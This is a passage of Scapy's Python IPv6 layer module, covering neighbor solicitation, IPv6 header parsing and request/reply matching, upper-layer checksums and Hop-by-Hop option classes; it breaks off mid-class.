1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp>
5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net>
6
7# Cool history about this file: http://natisbad.org/scapy/index.html
8
9
10"""
11IPv6 (Internet Protocol v6).
12"""
13
14
15from hashlib import md5
16import random
17import socket
18import struct
19from time import gmtime, strftime
20
21from scapy.arch import get_if_hwaddr
22from scapy.as_resolvers import AS_resolver_riswhois
23from scapy.base_classes import Gen, _ScopedIP
24from scapy.compat import chb, orb, raw, plain_str, bytes_encode
25from scapy.consts import WINDOWS
26from scapy.config import conf
27from scapy.data import (
28 DLT_IPV6,
29 DLT_RAW,
30 DLT_RAW_ALT,
31 ETHER_ANY,
32 ETH_P_ALL,
33 ETH_P_IPV6,
34 MTU,
35)
36from scapy.error import log_runtime, warning
37from scapy.fields import (
38 BitEnumField,
39 BitField,
40 ByteEnumField,
41 ByteField,
42 DestIP6Field,
43 FieldLenField,
44 FlagsField,
45 IntField,
46 IP6Field,
47 LongField,
48 MACField,
49 MayEnd,
50 PacketLenField,
51 PacketListField,
52 ShortEnumField,
53 ShortField,
54 SourceIP6Field,
55 StrField,
56 StrFixedLenField,
57 StrLenField,
58 X3BytesField,
59 XBitField,
60 XByteField,
61 XIntField,
62 XShortField,
63)
64from scapy.layers.inet import (
65 _ICMPExtensionField,
66 _ICMPExtensionPadField,
67 _ICMP_extpad_post_dissection,
68 IP,
69 IPTools,
70 TCP,
71 TCPerror,
72 TracerouteResult,
73 UDP,
74 UDPerror,
75)
76from scapy.layers.l2 import (
77 CookedLinux,
78 Ether,
79 GRE,
80 Loopback,
81 SNAP,
82 SourceMACField,
83)
84from scapy.packet import bind_layers, Packet, Raw
85from scapy.sendrecv import sendp, sniff, sr, srp1
86from scapy.supersocket import SuperSocket
87from scapy.utils import checksum, strxor
88from scapy.pton_ntop import inet_pton, inet_ntop
89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
90 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
91 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
92from scapy.volatile import RandInt, RandShort
93
94# Typing
95from typing import (
96 Optional,
97)
98
# This layer cannot work without IPv6 support in the socket module:
# fail at import time rather than later.
if not socket.has_ipv6:
    raise socket.error("can't use AF_INET6, IPv6 is disabled")
# Define the protocol-number constants on the socket module itself when
# they are missing, so later code can rely on them.
if not hasattr(socket, "IPPROTO_IPV6"):
    # Workaround for http://bugs.python.org/issue6926
    socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
    # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
    socket.IPPROTO_IPIP = 4

if conf.route6 is None:
    # unused import, only to initialize conf.route6
    import scapy.route6  # noqa: F401

##########################
#  Neighbor cache stuff  #
##########################

# Cache used by getmacbyip6() to remember resolved neighbors.
# NOTE(review): 120 is presumably the entry timeout in seconds - confirm
# against the netcache implementation.
conf.netcache.new_cache("in6_neighbor", 120)
117
118
@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
    """Sends and receive an ICMPv6 Neighbor Solicitation message

    This function sends an ICMPv6 Neighbor Solicitation message
    to get the MAC address of the neighbor with the specified IPv6 address.

    :param addr: IPv6 address of the neighbor to resolve (used as the
        target of the solicitation)
    :param src: source IPv6 address of the message
    :param iface: interface the message is sent on; the source MAC address
        is the hardware address of this interface
    :param timeout: time to wait for an answer (1 second by default)
    :param chainCC: passed unchanged to srp1()
    :return: the answer (ethernet frame), or None if none was gathered
    """
    # Multicast address derived from the target (binary form), its
    # printable form and the matching Ethernet address.
    nsma_bin = in6_getnsma(inet_pton(socket.AF_INET6, addr))
    ip_dst = inet_ntop(socket.AF_INET6, nsma_bin)
    mac_dst = in6_getnsmac(nsma_bin)
    mac_src = get_if_hwaddr(iface)

    request = (
        Ether(dst=mac_dst, src=mac_src) /
        IPv6(dst=ip_dst, src=src, hlim=255) /
        ICMPv6ND_NS(tgt=addr) /
        ICMPv6NDOptSrcLLAddr(lladdr=mac_src)
    )
    return srp1(request, type=ETH_P_IPV6, iface=iface, timeout=timeout,
                verbose=0, chainCC=chainCC)
146
147
@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
    # type: (str, int) -> Optional[str]
    """
    Returns the MAC address of the next hop used to reach a given IPv6 address.

    The lookup goes through these steps, in order:

    - a multicast address is mapped directly to its multicast MAC;
    - a route through the loopback interface yields "ff:ff:ff:ff:ff:ff";
    - the "in6_neighbor" cache is consulted;
    - a Neighbor Solicitation is sent with neighsol(), and a successful
      answer is stored in the cache.

    (chainCC parameter value ends up being passed to sending function
    used to perform the resolution, if needed)

    :return: the MAC address, or None when the resolution got no answer

    .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4.
    """
    # A Net6 object is reduced to its string form before any lookup
    if isinstance(ip6, Net6):
        ip6 = str(ip6)

    # Multicast destinations do not need any resolution
    if in6_ismaddr(ip6):
        return in6_getnsmac(inet_pton(socket.AF_INET6, ip6))

    iff, src_addr, next_hop = conf.route6.route(ip6)

    if iff == conf.loopback_name:
        return "ff:ff:ff:ff:ff:ff"

    # When the route reports a next hop, that is the address to resolve
    target = ip6 if next_hop == '::' else next_hop

    cached = conf.netcache.in6_neighbor.get(target)
    if cached:
        return cached

    answer = neighsol(target, src_addr, iff, chainCC=chainCC)
    if answer is None:
        return None

    # Prefer the link-layer address advertised in the answer; fall back to
    # the source address of the answering frame.
    if ICMPv6NDOptDstLLAddr in answer:
        mac = answer[ICMPv6NDOptDstLLAddr].lladdr
    else:
        mac = answer.src
    conf.netcache.in6_neighbor[target] = mac
    return mac
194
195
196#############################################################################
197#############################################################################
198# IPv6 Class #
199#############################################################################
200#############################################################################
201
# Next Header value -> human readable name (used by the "nh" enum fields)
ipv6nh = {
    0: "Hop-by-Hop Option Header",
    4: "IP",
    6: "TCP",
    17: "UDP",
    41: "IPv6",
    43: "Routing Header",
    44: "Fragment Header",
    47: "GRE",
    50: "ESP Header",
    51: "AH Header",
    58: "ICMPv6",
    59: "No Next Header",
    60: "Destination Option Header",
    112: "VRRP",
    132: "SCTP",
    135: "Mobility Header",
}

# Next Header value -> name of the class used to dissect what follows
ipv6nhcls = {
    0: "IPv6ExtHdrHopByHop",
    4: "IP",
    6: "TCP",
    17: "UDP",
    43: "IPv6ExtHdrRouting",
    44: "IPv6ExtHdrFragment",
    50: "ESP",
    51: "AH",
    58: "ICMPv6Unknown",
    59: "Raw",
    60: "IPv6ExtHdrDestOpt",
}
230
231
class IP6ListField(StrField):
    """
    Field holding a list of IPv6 addresses, 16 bytes each on the wire.

    On dissection the amount of data to consume is bounded either by
    ``length_from`` (a number of bytes) or by ``count_from`` (a number of
    addresses); ``length_from`` wins when both are given.
    """
    __slots__ = ["count_from", "length_from"]
    islist = 1

    def __init__(self, name, default, count_from=None, length_from=None):
        StrField.__init__(self, name, [] if default is None else default)
        self.count_from = count_from
        self.length_from = length_from

    def i2len(self, pkt, i):
        # Every address takes 16 bytes
        return len(i) * 16

    def i2count(self, pkt, i):
        return len(i) if isinstance(i, list) else 0

    def getfield(self, pkt, s):
        """Return (remaining bytes, list of printable addresses)."""
        max_count = None
        max_bytes = None
        if self.length_from is not None:
            max_bytes = self.length_from(pkt)
        elif self.count_from is not None:
            max_count = self.count_from(pkt)

        # With a byte limit, only that prefix is parsed; the rest is
        # handed back untouched.
        if max_bytes is None:
            pending, trailer = s, b""
        else:
            pending, trailer = s[:max_bytes], s[max_bytes:]

        addresses = []
        while pending:
            if max_count is not None:
                if max_count <= 0:
                    break
                max_count -= 1
            addresses.append(inet_ntop(socket.AF_INET6, pending[:16]))
            pending = pending[16:]
        return pending + trailer, addresses

    def i2m(self, pkt, x):
        """Concatenate the binary form of every address of the list."""
        packed = []
        for item in x:
            try:
                binary = inet_pton(socket.AF_INET6, item)
            except Exception:
                # Not a literal address: resolve it first
                resolved = socket.getaddrinfo(
                    item, None, socket.AF_INET6
                )[0][-1][0]
                binary = inet_pton(socket.AF_INET6, resolved)
            packed.append(binary)
        return b"".join(packed)

    def i2repr(self, pkt, x):
        if x is None:
            return "[]"
        return "[ %s ]" % ", ".join('%s' % item for item in x)
291
292
class _IPv6GuessPayload:
    name = "Dummy class that implements guess_payload_class() for IPv6"

    def default_payload_class(self, p):
        """
        Select the class used to dissect the bytes that follow this header.

        The decision is based on ``self.nh`` and, for some protocols, on the
        first bytes of ``p``. Every access to ``p`` is length-checked so
        that truncated data falls back to a generic class instead of
        raising IndexError.

        :param p: the bytes following the current header
        :return: the class to use for the payload
        """
        if self.nh == 58:  # ICMPv6
            if not p:
                # No type byte to look at
                return Raw
            t = orb(p[0])
            if len(p) > 2 and (t == 139 or t == 140):  # Node Info Query
                return _niquery_guesser(p)
            # Unknown types have an infinite minimum length, so they end
            # up as Raw below.
            if len(p) >= icmp6typesminhdrlen.get(t, float("inf")):  # Other ICMPv6 messages  # noqa: E501
                if t == 130 and len(p) >= 28:
                    # RFC 3810 - 8.1. Query Version Distinctions
                    return ICMPv6MLQuery2
                return icmp6typescls.get(t, Raw)
            return Raw
        elif self.nh == 135 and len(p) > 3:  # Mobile IPv6
            return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
        elif self.nh == 43 and len(p) > 2 and orb(p[2]) == 4:
            # Segment Routing header (routing type 4). The length check
            # avoids an IndexError on a truncated routing header.
            return IPv6ExtHdrSegmentRouting
        return ipv6nhcls.get(self.nh, Raw)
312
313
class IPv6(_IPv6GuessPayload, Packet, IPTools):
    """
    IPv6 header.

    ``plen`` is computed at build time when left to None. On dissection a
    ``plen`` of 0 combined with a Hop-by-Hop header triggers the Jumbogram
    handling of extract_padding().
    """
    name = "IPv6"
    fields_desc = [BitField("version", 6, 4),
                   BitField("tc", 0, 8),
                   BitField("fl", 0, 20),
                   ShortField("plen", None),
                   ByteEnumField("nh", 59, ipv6nh),
                   ByteField("hlim", 64),
                   SourceIP6Field("src"),
                   DestIP6Field("dst", "::1")]

    def route(self):
        """Used to select the L2 address"""
        dst = self.dst
        scope = None
        if isinstance(dst, (Net6, _ScopedIP)):
            scope = dst.scope
        if isinstance(dst, (Gen, list)):
            # Several destinations: route according to the first one
            dst = next(iter(dst))
        return conf.route6.route(dst, dev=scope)

    def mysummary(self):
        return "%s > %s (%i)" % (self.src, self.dst, self.nh)

    def post_build(self, p, pay):
        """Append the payload and fill in ``plen`` when it was not set."""
        p += pay
        if self.plen is None:
            # Everything after the 40-byte fixed header
            tmp_len = len(p) - 40
            p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
        return p

    def extract_padding(self, data):
        """
        Extract the IPv6 payload.

        :param data: the bytes following the IPv6 header
        :return: a (payload, padding) tuple
        """

        if self.plen == 0 and self.nh == 0 and len(data) >= 8:
            # Hop-by-Hop extension length, in bytes
            hbh_len = 8 + orb(data[1]) * 8

            # Extract length from the Jumbogram option
            # Note: the following algorithm takes advantage of the Jumbo
            #       option mandatory alignment (4n + 2, RFC2675 Section 2)
            jumbo_len = None
            # The option can only live inside the Hop-by-Hop header, and
            # its 6 bytes (type, length, 32-bit value) must all be present.
            scan_end = min(hbh_len, len(data))
            offset = 2
            while offset + 6 <= scan_end:
                if orb(data[offset]) == 0xc2:  # Jumbo option
                    # The length is carried in network byte order
                    jumbo_len = struct.unpack(
                        "!I", data[offset + 2:offset + 6]
                    )[0]
                    break
                offset += 4

            if jumbo_len is None:
                log_runtime.info("Scapy did not find a Jumbo option")
                jumbo_len = 0

            # NOTE(review): RFC 2675 defines the Jumbo Payload Length as
            # already including the Hop-by-Hop header; the historical sum
            # is kept here - confirm before changing it.
            tmp_len = hbh_len + jumbo_len
        else:
            tmp_len = self.plen

        return data[:tmp_len], data[tmp_len:]

    def hashret(self):
        """
        Return the bytes used to pair a request with its answer.

        Extension headers are looked through to find the effective next
        header, destination (routing headers) and source (Home Address
        Option).
        """
        if self.nh == 58 and isinstance(self.payload, _ICMPv6):
            if self.payload.type < 128:
                # ICMPv6 error: hash on the packet it quotes
                return self.payload.payload.hashret()
            elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
                return struct.pack("B", self.nh) + self.payload.hashret()

        if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
            return self.payload.hashret()

        nh = self.nh
        sd = self.dst
        ss = self.src
        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
            # With routing header, the destination is the last
            # address of the IPv6 list if segleft > 0
            nh = self.payload.nh
            try:
                sd = self.addresses[-1]
            except IndexError:
                sd = '::1'
            # TODO: big bug with ICMPv6 error messages as the destination of IPerror6  # noqa: E501
            #       could be anything from the original list ...
            # The destination is XORed with every address of the list.
            sd = inet_pton(socket.AF_INET6, sd)
            for a in self.addresses:
                a = inet_pton(socket.AF_INET6, a)
                sd = strxor(sd, a)
            sd = inet_ntop(socket.AF_INET6, sd)

        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            # With segment routing header (rh == 4), the destination is
            # the first address of the IPv6 addresses list
            try:
                sd = self.addresses[0]
            except IndexError:
                sd = self.dst

        if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
            nh = self.payload.nh

        if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
            nh = self.payload.nh

        if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
            # The last Home Address Option, if any, gives the real source
            foundhao = None
            for o in self.payload.options:
                if isinstance(o, HAO):
                    foundhao = o
            if foundhao:
                ss = foundhao.hoa
            nh = self.payload.nh  # XXX what if another extension follows ?

        if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
            sd = inet_pton(socket.AF_INET6, sd)
            ss = inet_pton(socket.AF_INET6, ss)
            return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()  # noqa: E501
        else:
            return struct.pack("B", nh) + self.payload.hashret()

    def answers(self, other):
        """
        Tell whether this packet (the reply) answers ``other`` (the request).
        """
        if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
            if self.nh in [4, 41]:
                return self.payload.answers(other)
            if isinstance(other, IPv6) and other.nh in [4, 41]:
                return self.answers(other.payload)
            if isinstance(other, IP) and other.proto in [4, 41]:
                return self.answers(other.payload)
        if not isinstance(other, IPv6):  # self is reply, other is request
            return False
        if conf.checkIPaddr:
            # ss = inet_pton(socket.AF_INET6, self.src)
            sd = inet_pton(socket.AF_INET6, self.dst)
            os = inet_pton(socket.AF_INET6, other.src)
            od = inet_pton(socket.AF_INET6, other.dst)
            # request was sent to a multicast address (other.dst)
            # Check reply destination addr matches request source addr (i.e
            # sd == os) except when reply is multicasted too
            # XXX test mcast scope matching ?
            if in6_ismaddr(other.dst):
                if in6_ismaddr(self.dst):
                    if ((od == sd) or
                            (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):  # noqa: E501
                        return self.payload.answers(other.payload)
                    return False
                if (os == sd):
                    return self.payload.answers(other.payload)
                return False
            elif (sd != os):  # or ss != od): <- removed for ICMP errors
                return False
        if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:  # noqa: E501
            # ICMPv6 Error message -> generated by IPv6 packet
            # Note : at the moment, we jump the ICMPv6 specific class
            # to call answers() method of erroneous packet (over
            # initial packet). There can be cases where an ICMPv6 error
            # class could implement a specific answers method that perform
            # a specific task. Currently, don't see any use ...
            return self.payload.payload.answers(other)
        elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
            return self.payload.answers(other.payload)
        elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
            return self.payload.answers(other.payload.payload)
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
            return self.payload.answers(other.payload.payload)
        elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):  # BU in reply to BRR, for instance  # noqa: E501
            return self.payload.payload.answers(other.payload)
        else:
            if (self.nh != other.nh):
                return False
            return self.payload.answers(other.payload)
491
492
class IPv46(IP, IPv6):
    """
    This class implements a dispatcher that is used to detect the IP version
    while parsing Raw IP pcap files.
    """
    name = "IPv4/6"

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Return IPv6 for version 6, IP otherwise.

        The version is read from the high nibble of the first byte when
        data is provided, else from the ``version`` keyword argument.
        """
        if _pkt:
            is_v6 = orb(_pkt[0]) >> 4 == 6
        else:
            is_v6 = kargs.get("version") == 6
        return IPv6 if is_v6 else IP
508
509
def inet6_register_l3(l2, l3):
    """
    Resolves the default L2 destination address when IPv6 is used.

    :param l2: the layer 2 packet (not used by the resolution)
    :param l3: the IPv6 packet whose destination has to be reached
    :return: the result of getmacbyip6() for the destination of ``l3``
    """
    destination = l3.dst
    return getmacbyip6(destination)


# Use the resolver above whenever an IPv6 layer sits on top of Ether
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
518
519
class IPerror6(IPv6):
    """IPv6 packet quoted inside an ICMPv6 error message."""
    name = "IPv6 in ICMPv6"

    def answers(self, other):
        """
        Tell whether this quoted packet matches ``other``, the packet sent.

        The comparison is done on the upper layers (extension headers are
        skipped), over the length of the shortest of the two.

        :param other: the original request
        :return: True if the quoted packet relates to ``other``
        """
        if not isinstance(other, IPv6):
            return False
        sd = inet_pton(socket.AF_INET6, self.dst)
        ss = inet_pton(socket.AF_INET6, self.src)
        od = inet_pton(socket.AF_INET6, other.dst)
        os = inet_pton(socket.AF_INET6, other.src)

        # Make sure that the ICMPv6 error is related to the packet scapy sent
        if not (isinstance(self.underlayer, _ICMPv6) and
                self.underlayer.type < 128):
            return False

        # find upper layer for self (possible citation)
        selfup = self.payload
        while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
            selfup = selfup.payload

        # find upper layer for other (initial packet). Also look for RH
        otherup = other.payload
        request_has_rh = False
        while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
            if isinstance(otherup, IPv6ExtHdrRouting):
                request_has_rh = True
            otherup = otherup.payload

        # Sources must match. Destinations must match too, unless the
        # request has a RH: in that case the dst address is not checked.
        if not (ss == os and (sd == od or request_has_rh)):
            return False

        # Let's deal with possible MSS Clamping
        if (isinstance(selfup, TCP) and
                isinstance(otherup, TCP) and
                selfup.options != otherup.options):  # seems clamped
            layers = (otherup, selfup)
            # Save fields modified by MSS clamping
            saved = [(layer.options, layer.chksum, layer.dataofs)
                     for layer in layers]
            try:
                # Nullify them
                for layer in layers:
                    layer.options = []
                    layer.chksum = 0
                    layer.dataofs = 0

                # Test it
                s1 = raw(selfup)
                s2 = raw(otherup)
                tmp_len = min(len(s1), len(s2))
                return s1[:tmp_len] == s2[:tmp_len]
            finally:
                # Recall saved values, even if building a packet failed,
                # so that the caller's packets are never left modified.
                for layer, (opts, cksum, dataofs) in zip(layers, saved):
                    layer.options = opts
                    layer.chksum = cksum
                    layer.dataofs = dataofs

        s1 = raw(selfup)
        s2 = raw(otherup)
        tmp_len = min(len(s1), len(s2))
        return s1[:tmp_len] == s2[:tmp_len]

    def mysummary(self):
        return Packet.mysummary(self)
597
598
599#############################################################################
600#############################################################################
601# Upper Layer Checksum computation #
602#############################################################################
603#############################################################################
604
class PseudoIPv6(Packet):
    """IPv6 Pseudo-header for checksum computation."""
    name = "Pseudo IPv6 Header"
    fields_desc = [
        IP6Field("src", "::"),
        IP6Field("dst", "::"),
        IntField("uplen", None),    # upper-layer length
        BitField("zero", 0, 24),
        ByteField("nh", 0),
    ]
612
613
def in6_pseudoheader(nh, u, plen):
    # type: (int, IP, int) -> PseudoIPv6
    """
    Build a PseudoIPv6 instance as specified in RFC 2460 8.1

    The underlayers of ``u`` are walked down to the first IPv6 instance,
    and the pseudo header is filled with:

    - the Next Header value ``nh``
    - the address of the _final_ destination: when a Routing Header with a
      non-zero segleft and a non-empty address list is met, its last
      address is used (first address for a Segment Routing Header). Only
      the first such header met counts. Otherwise the destination of the
      IPv6 instance is used.
    - the address of the _real_ source: the home address of a Destination
      Option header made of a single HAO option when there is one, the
      source of the IPv6 instance otherwise.
    - the upper layer length ``plen``

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param plen: the length of the upper layer and payload
    :return: the pseudo header, or None (with a warning) when no IPv6
        underlayer is found
    """
    pseudo = PseudoIPv6()
    pseudo.nh = nh

    final_dst = 0
    home_addr = 0
    dst_found = False
    layer = u
    while layer is not None and not isinstance(layer, IPv6):
        if (not dst_found and
                isinstance(layer, IPv6ExtHdrRouting) and
                layer.segleft != 0 and len(layer.addresses) != 0):
            final_dst = layer.addresses[-1]
            dst_found = True
        elif (not dst_found and
                isinstance(layer, IPv6ExtHdrSegmentRouting) and
                layer.segleft != 0 and len(layer.addresses) != 0):
            final_dst = layer.addresses[0]
            dst_found = True
        elif (isinstance(layer, IPv6ExtHdrDestOpt) and
                (len(layer.options) == 1) and
                isinstance(layer.options[0], HAO)):
            home_addr = layer.options[0].hoa
        layer = layer.underlayer

    if layer is None:
        warning("No IPv6 underlayer to compute checksum. Leaving null.")
        return None

    # "layer" is now the IPv6 header itself
    pseudo.src = home_addr if home_addr else layer.src
    pseudo.dst = final_dst if final_dst else layer.dst
    pseudo.uplen = plen
    return pseudo
669
670
def in6_chksum(nh, u, p):
    """
    As Specified in RFC 2460 - 8.1 Upper-Layer Checksums

    The checksum covers the pseudo header built by `.in6_pseudoheader`
    followed by ``p``.

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param p: the payload of the upper layer provided as a string
    :return: the checksum, or 0 when no pseudo header could be built
    """
    pseudo = in6_pseudoheader(nh, u, len(p))
    return 0 if pseudo is None else checksum(raw(pseudo) + p)
688
689
690#############################################################################
691#############################################################################
692# Extension Headers #
693#############################################################################
694#############################################################################
695
696
697# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    """Common base of the IPv6 extension header classes."""
    name = 'Abstract IPv6 Option Header'
    # TODO ...
    aliastypes = [
        IPv6,
        IPerror6,
    ]
701
702
703# IPv6 options for Extension Headers #
704
# Option type -> name, for the options of the Hop-by-Hop and Destination
# Options extension headers
_hbhopts = {
    0x00: "Pad1",
    0x01: "PadN",
    0x04: "Tunnel Encapsulation Limit",
    0x05: "Router Alert",
    0x06: "Quick-Start",
    0xc2: "Jumbo Payload",
    0xc9: "Home Address Option",
}
712
713
class _OTypeField(ByteEnumField):
    """
    Modified ByteEnumField that displays information regarding the IPv6
    option based on its option type value (What should be done by nodes that
    process the option if they do not understand it ...)

    It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
    """
    # Meaning of the two highest-order bits of the option type
    pol = {
        0x00: "00: skip",
        0x40: "01: discard",
        0x80: "10: discard+ICMP",
        0xC0: "11: discard+ICMP not mcast",
    }

    # Meaning of the third highest-order bit of the option type
    enroutechange = {
        0x00: "0: Don't change en-route",
        0x20: "1: May change en-route",
    }

    def i2repr(self, pkt, x):
        label = self.i2s.get(x, repr(x))
        policy = self.pol[x & 0xC0]
        en_route = self.enroutechange[x & 0x20]
        return "%s [%s, %s]" % (label, policy, en_route)
735
736
class HBHOptUnknown(Packet):
    """
    IPv6 Hop-By-Hop Option: generic type/length/data option.

    It is also the dissection entry point: dispatch_hook() redirects to
    the dedicated class when the option type is a known one.
    """
    name = "Scapy6 Unknown Option"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):
        """
        As specified in section 4.2 of RFC 2460, every options has
        an alignment requirement usually expressed xn+y, meaning
        the Option Type must appear at an integer multiple of x octets
        from the start of the header, plus y octets.

        That function is provided the current position from the
        start of the header and returns required padding length.
        """
        # By default, no alignment requirement
        return 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        if not _pkt:
            return cls
        # The first byte is the option type
        return _hbhoptcls.get(orb(_pkt[0]), cls)

    def extract_padding(self, p):
        # An option has no payload: what follows belongs to the next one
        return b"", p
766
767
class Pad1(Packet):
    """IPv6 Hop-By-Hop Option: padding made of the option type byte only."""
    name = "Pad1"
    fields_desc = [
        _OTypeField("otype", 0x00, _hbhopts),
    ]

    def alignment_delta(self, curpos):
        # No alignment requirement
        return 0

    def extract_padding(self, p):
        # An option has no payload: what follows belongs to the next one
        return b"", p
777
778
class PadN(Packet):
    """IPv6 Hop-By-Hop Option: padding with a length byte and data."""
    name = "PadN"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):
        # No alignment requirement
        return 0

    def extract_padding(self, p):
        # An option has no payload: what follows belongs to the next one
        return b"", p
791
792
class RouterAlert(Packet):
    """RFC 2711 - IPv6 Hop-By-Hop Option: Router Alert."""
    name = "Router Alert"
    fields_desc = [
        _OTypeField("otype", 0x05, _hbhopts),
        ByteField("optlen", 2),
        ShortEnumField(
            "value", None,
            {
                0: "Datagram contains a MLD message",
                1: "Datagram contains RSVP message",
                2: "Datagram contains an Active Network message",
                68: "NSIS NATFW NSLP",
                69: "MPLS OAM",
                65535: "Reserved",
            },
        ),
    ]
    # TODO : Check IANA has not defined new values for value field of RouterAlertOption  # noqa: E501
    # TODO : Now that we have that option, we should do something in MLD class that need it  # noqa: E501
    # TODO : IANA has defined ranges of values which can't be easily represented here.  # noqa: E501
    #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml

    def alignment_delta(self, curpos):
        # alignment requirement : 2n+0
        # Distance from curpos to the next position congruent to 0 mod 2
        return (0 - curpos) % 2

    def extract_padding(self, p):
        # An option has no payload: what follows belongs to the next one
        return b"", p
817
818
class RplOption(Packet):
    """RFC 6553 - RPL Option."""
    name = "RPL Option"
    fields_desc = [
        _OTypeField("otype", 0x63, _hbhopts),
        ByteField("optlen", 4),
        # One byte of flags
        BitField("Down", 0, 1),
        BitField("RankError", 0, 1),
        BitField("ForwardError", 0, 1),
        BitField("unused", 0, 5),
        XByteField("RplInstanceId", 0),
        XShortField("SenderRank", 0),
    ]

    def alignment_delta(self, curpos):
        # alignment requirement : 2n+0
        # Distance from curpos to the next position congruent to 0 mod 2
        return (0 - curpos) % 2

    def extract_padding(self, p):
        # An option has no payload: what follows belongs to the next one
        return b"", p
838
839
class Jumbo(Packet):
    """IPv6 Hop-By-Hop Option: Jumbo Payload."""
    name = "Jumbo Payload"
    fields_desc = [
        _OTypeField("otype", 0xC2, _hbhopts),
        ByteField("optlen", 4),
        IntField("jumboplen", None),
    ]

    def alignment_delta(self, curpos):
        # alignment requirement : 4n+2
        # Distance from curpos to the next position congruent to 2 mod 4
        return (2 - curpos) % 4

    def extract_padding(self, p):
        # An option has no payload: what follows belongs to the next one
        return b"", p
854
855
class HAO(Packet):
    """IPv6 Destination Options Header Option: Home Address Option."""
    name = "Home Address Option"
    fields_desc = [
        _OTypeField("otype", 0xC9, _hbhopts),
        ByteField("optlen", 16),
        IP6Field("hoa", "::"),
    ]

    def alignment_delta(self, curpos):
        # alignment requirement : 8n+6
        # Distance from curpos to the next position congruent to 6 mod 8
        return (6 - curpos) % 8

    def extract_padding(self, p):
        # An option has no payload: what follows belongs to the next one
        return b"", p
870
871
# Option type -> dedicated class, used by HBHOptUnknown.dispatch_hook()
_hbhoptcls = {
    0x00: Pad1,
    0x01: PadN,
    0x05: RouterAlert,
    0x63: RplOption,
    0xC2: Jumbo,
    0xC9: HAO,
}
878
879
880# Hop-by-Hop Extension Header #
881
class _OptionsField(PacketListField):
    """
    List of options of an extension header, padded automatically at build
    time unless the packet's 'autopad' value is false.

    ``curpos`` is the offset of the field from the start of the header;
    it is the starting point of the alignment computations.
    """
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, *args, **kargs):
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls, *args, **kargs)

    def i2len(self, pkt, i):
        # Length of the built options, padding included
        return len(self.i2m(pkt, i))

    def i2m(self, pkt, x):
        """Build the options, inserting Pad1/PadN options where needed."""

        def padding(size):
            # One missing byte is a Pad1, anything else a PadN whose two
            # header bytes are part of the gap.
            if size == 1:
                return raw(Pad1())
            if size != 0:
                return raw(PadN(optdata=b'\x00' * (size - 2)))
            return b""

        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            autopad = 1

        if not autopad:
            return b"".join(map(bytes, x))

        position = self.curpos
        chunks = []
        for option in x:
            # Align the option as it requires, then append it
            gap = option.alignment_delta(position)
            chunks.append(padding(gap))
            built = raw(option)
            chunks.append(built)
            position += gap + len(built)

        # Let's make the class including our option field
        # a multiple of 8 octets long
        overflow = position % 8
        if overflow != 0:
            chunks.append(padding(8 - overflow))

        return b"".join(chunks)

    def addfield(self, pkt, s, val):
        return s + self.i2m(pkt, val)
930
931
class _PhantomAutoPadField(ByteField):
    """
